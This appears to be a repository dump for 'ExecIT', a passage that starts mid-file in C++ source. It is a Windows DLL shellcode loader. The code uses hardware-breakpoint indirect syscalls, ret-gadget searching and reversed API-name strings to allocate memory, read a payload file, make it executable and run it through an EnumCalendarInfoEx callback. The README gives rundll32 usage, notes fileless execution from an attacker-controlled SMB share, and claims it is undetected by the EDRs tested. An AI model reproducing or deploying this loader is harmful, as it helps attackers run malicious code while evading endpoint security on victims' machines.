ExceptionInfo->ContextRecord->Rcx;\n                //mov eax, SSN\n                ExceptionInfo->ContextRecord->Rax = syscallNumber;\n                //Set RIP to syscall;ret; opcode address\n                ExceptionInfo->ContextRecord->Rip = syscallReturnAddress;\n\n            }\n\n            // Move breakpoint back to PrepareSyscall to catch the next invoke\n            ExceptionInfo->ContextRecord->Dr0 = (UINT64)&PrepareSyscall;\n\n\n        }\n        return EXCEPTION_CONTINUE_EXECUTION;\n    }\n    return EXCEPTION_CONTINUE_SEARCH;\n}\n\nbool FindRetGadget() {\n    // Dynamically search for a suitable \"ADD RSP,68;RET\" gadget in both kernel32 and kernelbase\n    retGadgetAddress = 
FindInModule(\"kernel32.dll\", (PBYTE)\"\\x48\\x83\\xC4\\x68\\xC3\", (PCHAR)\"xxxxx\");\n    if (retGadgetAddress != 0) {\n        return true;\n    }\n    else {\n        reverseStr2(kernelbase, SIZEOF(kernelbase));\n        retGadgetAddress = FindInModule(kernelbase, (PBYTE)\"\\x48\\x83\\xC4\\x68\\xC3\", (PCHAR)\"xxxxx\");\n        if (retGadgetAddress != 0) {\n            return true;\n        }\n    }\n    return false;\n}\n\nbool InitHWSyscalls() {\n    myThread = GetCurrentThread();\n    hNtdll = (HANDLE)GetModuleAddress((LPWSTR)L\"ntd\");\n\n    if (!FindRetGadget()) {\n        return false;\n    }\n\n    // Register exception handler\n    exceptionHandlerHandle = AddVectoredExceptionHandler(1, &HWSyscallExceptionHandler);\n\n    if (!exceptionHandlerHandle) {\n        return false;\n    }\n\n    return SetMainBreakpoint();\n}\n\nbool DeinitHWSyscalls() {\n    return RemoveVectoredExceptionHandler(exceptionHandlerHandle) != 0;\n}\n\n\n\n\nextern \"C\" __declspec(dllexport)  void WINAPI HelperFunc(HWND hwnd, HINSTANCE hinst, LPSTR lpszCmdLine, int nCmdShow)\n{\n    OutputDebugStringA(\"HelperFunc was executed\");\n    OutputDebugStringA(lpszCmdLine);\n    InitHWSyscalls();\n    char cNtReadFile[] = \"eliFdaeRtN\";\n    char cNtProtectVirtualMemory[] = \"yromeMlautriVtcetorPtN\";\n    LPVOID payload = NULL;\n    HANDLE hFile;\n    SIZE_T payload_len;\n\n    hFile = CreateFileA(lpszCmdLine, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);\n    if (hFile == INVALID_HANDLE_VALUE) {\n        return;\n    }\n    OutputDebugStringA(\"Opened File!\");\n    payload_len = GetFileSize(hFile, NULL);\n    if (payload_len == 0) {\n        return;\n    }\n    OutputDebugStringA(\"Got file Size\");\n\n    HANDLE hThread = NULL;\n\n    HANDLE hproc = (HANDLE)-1; //handle to current process\n\n\n\n\n    reverseStr(cNtAllocateVirtualMemory, SIZEOF(cNtAllocateVirtualMemory));\n    NtAllocateVirtualMemory_t allocvirtualmemory = 
(NtAllocateVirtualMemory_t)PrepareSyscall((char*)cNtAllocateVirtualMemory);\n    allocvirtualmemory(hproc, &payload, 0, (PULONG)&payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n    OutputDebugStringA(\"Alocated memory\");\n\n    IO_STATUS_BLOCK ioBlock;\n    reverseStr(cNtReadFile, SIZEOF(cNtReadFile));\n    NtReadFile_t readfile = (NtReadFile_t)PrepareSyscall((char*)cNtReadFile);\n    readfile(hFile, NULL, NULL, NULL, &ioBlock, payload, (DWORD)payload_len, NULL, NULL);\n\n    DWORD oldAccess = PAGE_READWRITE;\n    reverseStr(cNtProtectVirtualMemory, SIZEOF(cNtProtectVirtualMemory));\n    NtProtectVirtualMemory_t protectmemory = (NtProtectVirtualMemory_t)PrepareSyscall((char*)cNtProtectVirtualMemory);\n    protectmemory(hproc, (PVOID*)&payload, (PULONG)&payload_len, PAGE_EXECUTE_READ, &oldAccess);\n\n    ::EnumCalendarInfoEx((CALINFO_ENUMPROCEX)payload, LOCALE_USER_DEFAULT, ENUM_ALL_CALENDARS, CAL_SMONTHNAME1);\n\n    DeinitHWSyscalls();\n\n    Sleep(50000);\n}\n\nBOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)\n{\n    switch (fdwReason)\n    {\n    case DLL_PROCESS_ATTACH:\n        OutputDebugStringA(\"DllMain\");\n        break;\n    case DLL_PROCESS_DETACH:\n    case DLL_THREAD_ATTACH:\n    case DLL_THREAD_DETACH:\n        break;\n    }\n\n    return TRUE;\n}\n\n"
  },
  {
    "path": "ExecIT/framework.h",
    "content": "#pragma once\n\n//#define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers\n// Windows Header Files\n#include <windows.h>\n"
  },
  {
    "path": "ExecIT/pch.cpp",
    "content": "// pch.cpp: source file corresponding to the pre-compiled header\n\n#include \"pch.h\"\n\n// When you are using pre-compiled headers, this source file is necessary for compilation to succeed.\n"
  },
  {
    "path": "ExecIT/pch.h",
    "content": "// pch.h: This is a precompiled header file.\n// Files listed below are compiled only once, improving build performance for future builds.\n// This also affects IntelliSense performance, including code completion and many code browsing features.\n// However, files listed here are ALL re-compiled if any one of them is updated between builds.\n// Do not add files here that you will be updating frequently as this negates the performance advantage.\n\n#ifndef PCH_H\n#define PCH_H\n\n// add headers that you want to pre-compile here\n#include \"framework.h\"\n//#include \"HWSyscalls.h\"\n#include <iostream>\n#include <fstream>\n#include <inttypes.h>\n#endif //PCH_H\n"
  },
  {
    "path": "ExecIT/resource.h",
    "content": "//{{NO_DEPENDENCIES}}\n// Microsoft Visual C++ generated include file.\n// Used by ProjectName.rc\n//\n\n// Next default values for new objects\n// \n#ifdef APSTUDIO_INVOKED\n#ifndef APSTUDIO_READONLY_SYMBOLS\n#define _APS_NEXT_RESOURCE_VALUE        102\n#define _APS_NEXT_COMMAND_VALUE         40001\n#define _APS_NEXT_CONTROL_VALUE         1000\n#define _APS_NEXT_SYMED_VALUE           101\n#endif\n#endif\n"
  },
  {
    "path": "ExecIT.sln",
    "content": "﻿\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 17\nVisualStudioVersion = 17.5.33502.453\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"ExecIT\", \"ExecIT\\ExecIT.vcxproj\", \"{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x64.Build.0 = Debug|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Debug|x86.Build.0 = Debug|Win32\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x64.ActiveCfg = Release|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x64.Build.0 = Release|x64\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x86.ActiveCfg = Release|Win32\n\t\t{0F7A1D0F-1C36-4BE6-9C0B-39A15688CD7A}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {99BD5419-6E81-4800-BB0D-91971A7E0639}\n\tEndGlobalSection\nEndGlobal\n"
  },
  {
    "path": "README.md",
    "content": "# ExecIT\n\n## Description\nDLL Shellcode self-injector/runner based on HWSyscalls, intended to be executed with rundll32. May grant fileless execution if the victim endpoint has access to an attacker-controlled SMB share.\n\n## Usage\n```powershell\nrundll32.exe ExecIT.dll, HelperFunc, <path_to_file>\n```\n\n![poc](https://github.com/florylsk/ExecIT/assets/46110263/f4f13590-3ba7-45c3-a6a4-034f43b366a1)\n\n\n## Detection\n\nCurrently it is fully undetected across all EDRs tested (depending on the shellcode) as of this commit.\n\nE.g., for Defender for Endpoint EDR:\n\n\n![image](https://github.com/florylsk/ExecIT/assets/46110263/a967f39b-027c-4bfa-b867-f6ec955ff54f)\n\n## Disclaimer\n\nThe information/files provided in this repository are strictly intended for educational and ethical purposes only. The techniques and tools are intended to be used in a lawful and responsible manner, with the explicit consent of the target system's owner. Any unauthorized or malicious use of these techniques and tools is strictly prohibited and may result in legal consequences. I am not responsible for any damages or legal issues that may arise from the misuse of the information provided.\n"
  }
]